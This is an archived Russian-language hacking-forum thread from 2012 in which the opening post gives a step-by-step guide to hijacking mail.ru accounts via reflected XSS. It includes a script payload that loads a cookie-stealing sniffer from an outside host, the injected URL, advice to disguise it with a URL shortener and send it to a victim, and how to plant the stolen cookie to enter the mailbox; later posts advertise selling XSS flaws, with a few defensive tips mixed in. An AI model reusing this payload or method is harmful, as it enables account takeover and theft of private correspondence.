Просмотр полной версии : Взлом мыла с помощью пассивной xss
tickhack
01.02.2012, 15:22
Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.
1.Нам понадобиться Пассивка
2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/
3.Мозги и руки !
Так заходим на сниффер и берём Код для пассивной XSS атаки вот он
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"
мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так
http://mail.ru/###********=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"
Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.
Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/
заходим на этот сайт и где написано
Enter a long URL to make tiny:
вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку
make a TinyURL
И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.
ну чтож думаю всё !
не забываем про "+"
Автор : Tickhack
M_script
01.02.2012, 15:54
tickhack, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
После этого что делать?
M_script после этого ты попадаешь в мыло жертвы если куки еще действительны будут!)))
tickhack
01.02.2012, 16:39
tickhack
, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
После этого что делать?
после этого заходишь на майл.ру и попадаешь на мыло жертвы
только не забудь заменить куки жертвы на свои в опере
kravch_v
01.02.2012, 17:15
после этого заходишь на майл.ру и попадаешь на мыло жертвы
только не забудь заменить куки жертвы на свои в опере
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)
tickhack
01.02.2012, 17:31
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)
Не жалко у меня их много
tickhack
01.02.2012, 17:34
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)
уже нету пассивки
tickhack
, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
После этого что делать?
Потроллить решил?
M_script
01.02.2012, 18:12
martmm, tickhack, вы неправильно поняли вопрос.
Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?
martmm
,
tickhack
, вы не правильно поняли вопрос.
Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?
Ну если я не отстал от жизни, то думаю никак. Разве мегабаг найдут. Видел пару тем, в которых предлагают купить:
Смена пароля в сессии
Как это делают, хз.
M_script
01.02.2012, 18:43
Ну если я не отстал от жизни, то думаю никак
Стандартных возможностей для этого в почтовом сервисе разумеется нет. Так же, как нет стандартных возможностей внедрения JS-кода, кражи сессий и т.д.
kravch_v
01.02.2012, 18:44
Стандартных возможностей для этого в почтовом сервисе разумеется нет. Так же, как нет стандартных возможностей внедрения JS-кода, кражи сессий и т.д.
В мейле это невозможно.
Сейчас можно только: в одноклассниках, вконтакте.
Раньше можно было в яндексе
В мейле это невозможно.
Сейчас можно только: в одноклассниках, вконтакте.
Раньше можно было в яндексе
Вот вот. Есть какие-то умлельцы. CSRF+Fake?!
M_script
01.02.2012, 18:55
В мейле это невозможно.
Откуда такая уверенность в безопасности мейла?
Ребята, а кким образом можно обезопасить себе на mail.ru, чтоб не стать жертвой XSS? фейк, СИ - не пройдет как бы 98% это я о себе, но боюсь, что с помощю XSS это сделают. Может есть какие то решения как можно больше обезопасить себя?
Ребята, а кким образом можно обезопасить себе на mail.ru, чтоб не стать жертвой XSS? фейк, СИ - не пройдет как бы 98%
это я о себе, но боюсь, что с помощю XSS это сделают. Может есть какие то решения как можно больше обезопасить себя?
В настройках безопасности есть пункт сессия только с одного IP-адреса
M_script
02.02.2012, 00:00
thrust, сессия с одного IP не поможет. Через XSS можно не только куки украсть, но и прочитать все письма непосредственно из твоего браузера.
B1t.exe, не заходи на мыло через веб-интерфейс, используй почтовые клиенты.
В настройках безопасности есть пункт сессия только с одного IP-адреса
Он уже стоит у меня (или по умолчанию у всех стоит)
thrust
, сессия с одного IP не поможет. Через XSS можно не только куки украсть, но и прочитать все письма непосредственно из твоего браузера.
B1t.exe
, не заходи на мыло через веб-интерфейс, используй почтовые клиенты.
без клиента никак? просто никак немогу привыкать клиенты. мне они не нравятся.
M_script
02.02.2012, 01:56
без клиента никак? просто никак немогу привыкать клиенты. мне они не нравятся.
Можно еще отключить JS в браузере. Но удобнее юзать клиент.
Способы есть! Их продают! Где-то давно видел способ смены пароля в паблике через другой ящик! Сейчас работает или нет не знаю!
В этой статье можно было описать хотя бы старый нерабочий способ или указать ссылки на темы продаж.
"Как угнать куки через пассивку" != "Взлом мыла с помощью пассивной xss"
martmm
,
tickhack
, вы неправильно поняли вопрос.
Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?
Способы есть! Их продают! Где-то давно видел способ смены пароля в паблике через другой ящик! Сейчас работает или нет не знаю!
не работает
если он спалил в паб, естественно она прожила не долго (пофиксили)
ну это для тебя будет примером, теперь ты знаешь что такое пассивная XSS и как её эксплуатировать
tickhack
02.02.2012, 19:31
КОМУ НУЖНА XSS СТУЧИТЕ В ICQ 101023043
kravch_v
02.02.2012, 21:06
КОМУ НУЖНА XSS СТУЧИТЕ В ICQ 101023043
Зачем продавать то, что лежит в паблике?
tickhack
03.02.2012, 01:02
Зачем продавать то, что лежит в паблике?
в паблике уже нету
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot